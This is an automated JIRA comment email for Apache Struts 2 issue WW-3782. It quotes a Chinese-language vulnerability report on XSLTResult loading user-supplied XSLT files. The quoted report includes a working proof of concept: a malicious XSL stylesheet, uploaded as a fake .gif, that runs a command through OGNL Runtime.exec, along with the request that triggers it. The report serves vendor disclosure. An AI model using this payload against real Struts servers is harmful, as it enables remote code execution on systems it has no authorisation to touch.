[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞

[zhouyanming (Commented) (JIRA)]

    [ 
https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235302#comment-13235302
 ] 

zhouyanming commented on WW-3782:
---------------------------------

哥们太搞了,天朝还没占领全世界
                
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Critical
>              Labels: patch
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型，其中包括XSLT类型，这种类型允许接受用户提交一个文件地址，并且去解析它为XSLT文件，无论扩展名是什么。
>  这是XSLTResult文件代码：
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = 
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析，会允许执行java静态方法，所以，只要上传一个文件在服务器上，例如
>  /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform";
>                version="1.0" xmlns:ognl="ognl.Ognl">
>       <xsl:template match="/">
>               <html> 
>                       <body> 
>                          <h2>hacked by kxlzx</h2> 
>                          <h2>http://www.inbreak.net</h2> 
>                          <exp>
>                                        <xsl:value-of 
> select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
>                               </exp>
>                       </body> 
>               </html> 
>       </xsl:template> 
> </xsl:stylesheet>
> 这个xsl文件解析时，会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>  
> http://www.inbreak.net/xslt.action
>  
> 我们就可以提交
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: 
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira